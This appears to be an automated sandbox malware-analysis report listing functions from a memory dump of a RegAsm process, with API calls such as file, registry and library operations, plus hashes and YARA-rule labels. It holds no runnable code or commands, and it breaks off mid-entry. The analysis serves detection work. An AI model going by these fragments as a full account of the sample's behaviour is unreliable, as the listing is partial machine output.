                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memcmpmemset
                                                • String ID:
                                                • API String ID: 1065087418-0
                                                • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                • CloseHandle.KERNEL32(?), ref: 00410654
                                                  • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                  • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                • String ID:
                                                • API String ID: 1381354015-0
                                                • Opcode ID: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                                                • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                • Opcode Fuzzy Hash: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                                                • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                Function 004136C0 Relevance: 1.7, APIs: 1, Instructions: 163COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                                                • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                                                Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                  • Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                  • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: File$Time$CloseCompareCreateHandlememset
                                                • String ID:
                                                • API String ID: 2154303073-0
                                                • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: File$PointerRead
                                                • String ID:
                                                • API String ID: 3154509469-0
                                                • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: PrivateProfile$StringWrite_itowmemset
                                                • String ID:
                                                • API String ID: 4232544981-0
                                                • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                Download Yara Rule
                                                APIs
                                                • FreeLibrary.KERNEL32(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                Download Yara Rule
                                                APIs
                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: FileModuleName
                                                • String ID:
                                                • API String ID: 514040917-0
                                                • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteFile.KERNEL32(?,00000009,?,00000000,00000000), ref: 0040A325
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: FileWrite
                                                • String ID:
                                                • API String ID: 3934441357-0
                                                • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                Download Yara Rule
                                                APIs
                                                • FreeLibrary.KERNEL32(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ??3@
                                                • String ID:
                                                • API String ID: 613200358-0
                                                • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                Download Yara Rule
                                                APIs
                                                • FreeLibrary.KERNEL32(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                Download Yara Rule
                                                APIs
                                                • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: EnumNamesResource
                                                • String ID:
                                                • API String ID: 3334572018-0
                                                • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                Download Yara Rule
                                                APIs
                                                • FindClose.KERNEL32(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: CloseFind
                                                • String ID:
                                                • API String ID: 1863332320-0
                                                • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Open
                                                • String ID:
                                                • API String ID: 71445658-0
                                                • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 004095FC
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                  • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                  • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                • String ID:
                                                • API String ID: 3655998216-0
                                                • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 00445426
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                • String ID:
                                                • API String ID: 1828521557-0
                                                • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                  • Part of subcall function 004062A6: SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ??2@FilePointermemcpy
                                                • String ID:
                                                • API String ID: 609303285-0
                                                • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: _wcsicmp
                                                • String ID:
                                                • API String ID: 2081463915-0
                                                • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                Memory Dump Source
